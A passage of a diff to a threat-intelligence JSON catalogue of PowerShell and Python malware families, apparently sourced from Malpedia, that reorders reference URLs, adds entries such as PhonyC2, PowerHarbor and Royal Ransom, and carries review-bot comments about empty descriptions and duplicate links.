- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://github.com/mhaskar/Octopus",
- "https://isc.sans.edu/diary/26918",
+ "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
 "https://isc.sans.edu/diary/rss/28628",
- "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://isc.sans.edu/diary/26918",
+ "https://github.com/mhaskar/Octopus"
 ],
 "synonyms": [],
 "type": []
@@ -10366,8 +10811,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig",
- "https://twitter.com/MJDutch/status/1074820959784321026?s=19",
 "https://threatpost.com/oilrig-apt-unique-backdoor/157646/",
+ "https://twitter.com/MJDutch/status/1074820959784321026?s=19",
 "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html"
 ],
 "synonyms": [],
@@ -10376,6 +10821,19 @@
 "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3",
 "value": "OilRig"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.phonyc2",
+ "https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c630e510-a0ad-405a-9aeb-9d8057b6a868",
+ "value": "PhonyC2"
+ },
 {
 "description": "",
 "meta": {
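Review bot: The new PhonyC2 entry lands with `"description": ""`, which leaves analysts with only the URL slug of the single Deep Instinct reference to work out what it is. That slug (`phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater`) and the Malpedia identifier `ps1.phonyc2` support at least `"description": "PowerShell-based command-and-control framework attributed by Deep Instinct to MuddyWater."` — verify the attribution wording against the post. Note that the same Deep Instinct URL is also appended to the POWERSTATS entry later in this commit, so a short description here helps readers tell the two clusters apart; if the empty description comes from Malpedia, it should be filled in upstream.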
@@ -10404,6 +10862,19 @@
 "uuid": "7b334343-0045-4d65-b28a-ebf912c7aafc",
 "value": "PowerBrace"
 },
+ {
+ "description": "PowerHarbor is a modular PowerShell-based malware that consists of various modules. The primary module maintains constant communication with the C2 server, executing and deleting additional modules received from it. Currently, the communication with the C2 server is encrypted using RSA encryption and hardcoded key data. Moreover, the main module incorporates virtual machine (VM) detection capabilities. The StealData module employs the Invoke-Stealer function as its core, enabling the theft of system information, browser-stored credentials, cryptocurrency wallet details, and credentials for various applications like Telegram, FileZilla, and WinSCP.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerharbor",
+ "https://insight-jp.nttsecurity.com/post/102ignh/steelcloverpowerharbor"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "73b40a4c-9163-4a07-bf1b-e4a4344ac63a",
+ "value": "PowerHarbor"
+ },
 {
 "description": "",
 "meta": {
@@ -10423,8 +10894,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
 ],
 "synonyms": [],
 "type": []
@@ -10476,14 +10947,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower",
- "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability",
- "https://attack.mitre.org/groups/G0100",
+ "https://attack.mitre.org/groups/G0100/",
 "https://unit42.paloaltonetworks.com/atoms/clean-ursa/",
 "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
- "https://attack.mitre.org/groups/G0100/",
+ "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability",
+ "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "https://attack.mitre.org/groups/G0100",
 "https://unit42.paloaltonetworks.com/atoms/clean-ursa",
- "https://securelist.com/recent-cloud-atlas-activity/92016",
- "https://securelist.com/recent-cloud-atlas-activity/92016/"
+ "https://securelist.com/recent-cloud-atlas-activity/92016"
 ],
 "synonyms": [],
 "type": []
@@ -10496,9 +10967,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource",
- "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
+ "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html"
 ],
 "synonyms": [],
 "type": []
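Review bot: The PowerShower `refs` list on the new side still carries four pairs of URLs that differ only by a trailing slash (`attack.mitre.org/groups/G0100` and `.../G0100/`, the two `unit42-inception-attackers-...-vulnerability` entries, `atoms/clean-ursa` and `atoms/clean-ursa/`, `recent-cloud-atlas-activity/92016` and `.../92016/`); this hunk only reorders them. Each pair points at one resource, so the list should be normalised to a single form — e.g. keep `"https://attack.mitre.org/groups/G0100/"` and drop the slash-less twin — before it is committed. If this cluster file is produced by the Malpedia import script, as the `malpedia.caad.fkie.fraunhofer.de/details/...` first reference in every entry suggests, the de-duplication belongs in that script so the duplicates do not reappear on the next regeneration.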
@@ -10524,25 +10996,35 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats",
- "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
 "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
- "https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/",
- "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
- "https://unit42.paloaltonetworks.com/atoms/boggyserpens/",
- "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://mp.weixin.qq.com/s/NN_iRvwA6yOHFS9Z3A0RBA",
+ "https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/",
 "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
- "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
+ "https://research.checkpoint.com/2019/the-muddy-waters-of-apt-attacks/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
+ "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
 "https://blog.prevailion.com/2020/01/summer-mirage.html",
- "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/"
+ "https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater",
+ "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
+ "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/",
+ "https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
+ "https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html",
+ "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "https://web.archive.org/web/20180807105755/https://www.sekoia.fr/blog/falling-on-muddywater/",
+ "https://www.group-ib.com/blog/muddywater/",
+ "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/boggyserpens/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/",
+ "https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html",
+ "https://sec0wn.blogspot.com/2018/03/a-quick-dip-into-muddywaters-recent.html",
+ "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster"
 ],
 "synonyms": [
 "Valyria"
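Review bot: The rebuilt POWERSTATS `refs` list keeps both `http://www.secureworks.com/research/threat-profiles/cobalt-ulster` and `https://www.secureworks.com/research/threat-profiles/cobalt-ulster`, which name the same page and differ only in scheme; keep the https entry and drop the plain-http one, which also avoids pointing consumers at a cleartext URL. Using a `web.archive.org` capture for the Sekoia post is the right way to keep a dead reference usable. The `https://mp.weixin.qq.com/s/NN_iRvwA6yOHFS9Z3A0RBA` entry is an opaque short link whose subject cannot be recovered from the URL, so it is hard to review or to re-find if it rots — consider pairing it with an archived copy, and if the list is generated from Malpedia, apply both fixes upstream.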
@@ -10557,13 +11039,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton",
- "https://www.symantec.com/security-center/writeup/2019-062513-4935-99",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
- "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "https://norfolkinfosec.com/apt33-powershell-malware/",
 "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
 "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://norfolkinfosec.com/apt33-powershell-malware/"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
+ "https://www.symantec.com/security-center/writeup/2019-062513-4935-99"
 ],
 "synonyms": [],
 "type": []
@@ -10598,7 +11080,7 @@
 "value": "PowerWare"
 },
 {
- "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.",
+ "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft\u2019s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure",
@@ -10615,6 +11097,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.power_magic",
+ "https://securelist.com/cloudwizard-apt/109722/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger",
 "https://securelist.com/bad-magic-apt/109087/?s=31"
 ],
 "synonyms": [],
@@ -10628,18 +11112,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop",
- "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf",
- "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf",
 "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
 "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
 "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
- "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
 "https://unit42.paloaltonetworks.com/thanos-ransomware/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
+ "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/",
+ "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/",
+ "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant"
 ],
 "synonyms": [],
 "type": []
@@ -10652,8 +11136,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner",
- "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
 ],
 "synonyms": [],
 "type": []
@@ -10679,10 +11163,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
 "https://youtu.be/pBDu8EGWRC4?t=2492",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
 "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
 ],
 "synonyms": [],
@@ -10709,9 +11193,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
 "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/",
- "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca"
+ "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/"
 ],
 "synonyms": [],
 "type": []
@@ -10719,6 +11203,19 @@
 "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d",
 "value": "RogueRobin"
 },
+ {
+ "description": "Toolkit downloader used by Royal Ransomware group, involving GnuPG for decryption.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.royal_ransom",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1c75ffff-59f9-4fdc-958d-51f822f76c35",
+ "value": "Royal Ransom (Powershell)"
+ },
 {
 "description": "",
 "meta": {
@@ -10750,19 +11247,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload",
- "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy",
- "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/",
- "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/",
 "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html",
+ "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/",
 "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9",
 "https://threatpost.com/sload-spying-payload-delivery-bits/151120/",
- "https://blog.minerva-labs.com/sload-targeting-europe-again",
 "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan",
- "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/",
- "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/",
+ "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/",
 "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/",
- "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/"
+ "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/",
+ "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html",
+ "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/",
+ "https://blog.minerva-labs.com/sload-targeting-europe-again",
+ "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy"
 ],
 "synonyms": [
 "Starslord"
@@ -10843,8 +11340,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002",
- "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/"
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
+ "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/"
 ],
 "synonyms": [],
 "type": []
@@ -10870,6 +11367,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.vipersoftx",
+ "https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga",
 "https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/"
 ],
 "synonyms": [],
@@ -10883,12 +11381,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine",
- "https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/",
- "https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry",
+ "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/",
 "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/",
- "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/",
+ "https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry",
 "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf",
- "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/"
+ "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/",
+ "https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/"
 ],
 "synonyms": [],
 "type": []
@@ -10969,11 +11467,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot",
- "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
- "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
 "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
+ "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
 "http://seclists.org/fulldisclosure/2017/Mar/7",
+ "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
 "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
 "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/"
 ],
@@ -11040,18 +11538,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne",
- "https://github.com/AlessandroZ/LaZagne",
- "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://attack.mitre.org/groups/G0100/",
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf",
+ "https://attack.mitre.org/groups/G0100",
+ "https://github.com/AlessandroZ/LaZagne",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
 "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
 "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
- "https://attack.mitre.org/groups/G0100",
- "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf",
 "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://www.infinitumit.com.tr/apt-35/"
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/"
 ],
 "synonyms": [],
 "type": []
@@ -11092,20 +11590,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph",
- "https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/",
- "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/",
- "https://twitter.com/xuy1202/status/1392089568384454657",
- "https://www.lacework.com/blog/the-kek-security-network/",
- "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
- "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/",
- "https://www.lacework.com/keksec-tsunami-ryuk/",
- "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr",
- "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html",
- "https://github.com/lacework/lacework-labs/tree/master/keksec",
- "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
 "https://www.lacework.com/the-kek-security-network/",
 "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/",
- "https://twitter.com/xuy1202/status/1393384128456794116"
+ "https://www.lacework.com/blog/the-kek-security-network/",
+ "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
+ "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/",
+ "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html",
+ "https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/",
+ "https://www.lacework.com/keksec-tsunami-ryuk/",
+ "https://twitter.com/xuy1202/status/1393384128456794116",
+ "https://github.com/lacework/lacework-labs/tree/master/keksec",
+ "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr",
+ "https://twitter.com/xuy1202/status/1392089568384454657",
+ "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
+ "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/"
 ],
 "synonyms": [
 "FreakOut",
@@ -11149,13 +11647,13 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat",
 "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/",
 "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
- "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
- "https://blog.talosintelligence.com/2020/10/poetrat-update.html",
- "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
 "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf"
+ "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://blog.talosintelligence.com/2020/10/poetrat-update.html",
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
 ],
 "synonyms": [],
 "type": []
@@ -11181,11 +11679,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
 "https://github.com/n1nj4sec/pupy",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -11197,6 +11695,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader",
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader"
 ],
 "synonyms": [],
@@ -11280,8 +11779,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra",
- "https://www.youtube.com/watch?v=Bk-utzAlYFI",
- "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/"
+ "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/",
+ "https://www.youtube.com/watch?v=Bk-utzAlYFI"
 ],
 "synonyms": [],
 "type": []
@@ -11294,8 +11793,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.serpent",
